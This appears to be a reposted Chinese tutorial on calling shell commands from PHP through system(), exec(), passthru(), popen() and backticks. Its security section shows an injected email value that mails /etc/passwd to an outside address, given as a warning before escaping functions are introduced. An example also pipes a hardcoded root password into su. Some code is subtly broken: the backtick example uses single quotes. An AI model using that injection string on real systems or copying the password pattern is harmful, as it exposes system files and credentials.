天天看點

PHP 執行系統外部指令 system() exec() passthru()

差別:

system() 輸出并傳回最後一行shell結果。

exec() 不輸出結果,傳回最後一行shell結果,所有結果可以儲存到一個傳回的數組裡面。

passthru() 隻調用指令,把指令的運作結果原樣地直接輸出到标準輸出裝置上。

相同點:都可以獲得指令執行的狀态碼

demo:

//system('dir');

// exec ('dir');

// passthru ('dir');

// echo `dir`;

PHP作為一種伺服器端的腳本語言,象編寫簡單,或者是複雜的動态網頁這樣的任務,它完全能夠勝任。但事情不總是如此,有時為了實作某個功能,必須借助于作業系統的外部程式(或者稱之為指令),這樣可以做到事半功倍。 

那麼,是否可以在PHP腳本中調用外部指令呢?如果能,如何去做呢?有些什麼方面的顧慮呢?相信你看了本文後,肯定能夠回答這些問題了。

是否可以?

答案是肯定的。PHP和其它的程式設計語言一樣,完全可以在程式内調用外部指令,并且是很簡單的:隻要用一個或幾個函數即可。

前提條件

由于PHP基本是用于WEB程式開發的,是以安全性成了人們考慮的一個重要方面。于是PHP的設計者們給PHP加了一個門:安全模式。如果運作在安全模式下,那麼PHP腳本中将受到如下四個方面的限制:

執行外部指令

在打開檔案時有些限制

連接配接MySQL資料庫

基于HTTP的認證

在 安全模式下,隻有在特定目錄中的外部程式才可以被執行,對其它程式的調用将被拒絕。這個目錄可以在php.ini檔案中用 safe_mode_exec_dir指令,或在編譯PHP是加上--with-exec-dir選項來指定,預設是 /usr/local/php/bin。

如果你調用一個應該可以輸出結果的外部指令(意思是PHP腳本沒有錯誤),得到的卻是一片空白,那麼很可能你的網管已經把PHP運作在安全模式下了。

如何做?

在PHP中調用外部指令,可以用如下三種方法來實作:

1) 用PHP提供的專門函數

PHP提供共了3個專門的執行外部指令的函數:system(),exec(),passthru()。

system()

原型:string system (string command [, int return_var])

system()函數很其它語言中的差不多,它執行給定的指令,輸出和傳回結果。第二個參數是可選的,用來得到指令執行後的狀态碼。

例子:

system("/usr/local/bin/webalizer/webalizer");

?>

exec()

原型:string exec (string command [, string array [, int return_var]])

exec ()函數與system()類似,也執行給定的指令,但不輸出結果,而是傳回結果的最後一行。雖然它隻傳回指令結果的最後一行,但用第二個參數array 可以得到完整的結果,方法是把結果逐行追加到array的結尾處。是以如果array不是空的,在調用之前最好用unset()最它清掉。隻有指定了第二 個參數時,才可以用第三個參數,用來取得指令執行的狀态碼。

exec("/bin/ls -l");

exec("/bin/ls -l", $res);

exec("/bin/ls -l", $res, $rc);

passthru()

原型:void passthru (string command [, int return_var])

passthru ()隻調用指令,不傳回任何結果,但把指令的運作結果原樣地直接輸出到标準輸出裝置上。是以passthru()函數經常用來調用象pbmplus (Unix下的一個處理圖檔的工具,輸出二進制的原始圖檔的流)這樣的程式。同樣它也可以得到指令執行的狀态碼。

header("Content-type: image/gif");

passthru("./ppmtogif hunte.ppm");

2) 用popen()函數打開程序

上面的方法隻能簡單地執行指令,卻不能與指令互動。但有些時候必須向指令輸入一些東西,如在增加Linux的系統使用者時,要調用su來把目前使用者換到root才行,而su指令必須要在指令行上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。

popen ()函數打開一個程序管道來執行給定的指令,傳回一個檔案句柄。既然傳回的是一個檔案句柄,那麼就可以對它讀和寫了。在PHP3中,對這種句柄隻能做單一 的操作模式,要麼寫,要麼讀;從PHP4開始,可以同時讀和寫了。除非這個句柄是以一種模式(讀或寫)打開的,否則必須調用pclose()函數來關閉 它。

例子1:

$fp=popen("/bin/ls -l", "r");

例子2(本例來自PHP中國聯盟網站http://www.phpx.com/show.php?d=col&i=51):

/* PHP中如何增加一個系統使用者

下面是一段例程,增加一個名字為james的使用者,

root密碼是 verygood。僅供參考

*/

$sucommand = "su --login root --command";

$useradd = "useradd ";

$rootpasswd = "verygood";

$user = "james";

$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);

$fp = @popen($user_add,"w");

@fputs($fp,$rootpasswd);

@pclose($fp);

3) 用反撇号(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)

這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。方法很簡單,用兩個反撇号把要執行的指令括起來作為一個表達式,這個表達式的值就是指令執行的結果。如:

$res='/bin/ls -l';

echo ' 

'.$res.' 

';

這個腳本的輸出就象:

hunte.gif

hunte.ppm

jpg.htm

jpg.jpg

passthru.php

要考慮些什麼?

要考慮兩個問題:安全性和逾時。

先 看安全性。比如,你有一家小型的網上商店,是以可以出售的産品清單放在一個檔案中。你編寫了一個有表單的HTML檔案,讓你的使用者輸入他們的EMAIL地 址,然後把這個産品清單發給他們。假設你沒有使用PHP的mail()函數(或者從未聽說過),你就調用Linux/Unix系統的mail程式來發送這 個檔案。程式就象這樣:

system("mail $to < products.txt");

echo "我們的産品目錄已經發送到你的信箱:$to";

用這段代碼,一般的使用者不會産生什麼危險,但實際上存在着非常大的安全漏洞。如果有個惡意的使用者輸入了這樣一個EMAIL位址:

'--bla ; mail [email protected] < /etc/passwd ;'

那麼這條指令最終變成:

'mail --bla ; mail [email protected] < /etc/passwd ; < products.txt'

我相信,無論哪個網絡管理人員見到這樣的指令,都會吓出一身冷汗來。

幸 好,PHP為我們提供了兩個函數:EscapeShellCmd()和EscapeShellArg()。函數EscapeShellCmd把一個字元串 中所有可能瞞過Shell而去執行另外一個指令的字元轉義。這些字元在Shell中是有特殊含義的,象分号(),重定向(>)和從檔案讀入 (<)等。函數EscapeShellArg是用來處理指令的參數的。它在給定的字元串兩邊加上單引号,并把字元串中的單引号轉義,這樣這個字元串 就可以安全地作為指令的參數。

再來看看逾時問題。如果要執行的指令要花費很長的時間,那麼應該把這個指令放到系統的背景去運 行。但在預設情況下,象system()等函數要等到這個指令運作完才傳回(實際上是要等指令的輸出結果),這肯定會引起PHP腳本的逾時。解決的辦法是 把指令的輸出重定向到另外一個檔案或流中,如:

system("/usr/local/bin/order_proc > /tmp/null &");

本文轉自 今天我不乖 51CTO部落格,原文連結:http://blog.51cto.com/buguaisp2/191573,如需轉載請自行聯系原作者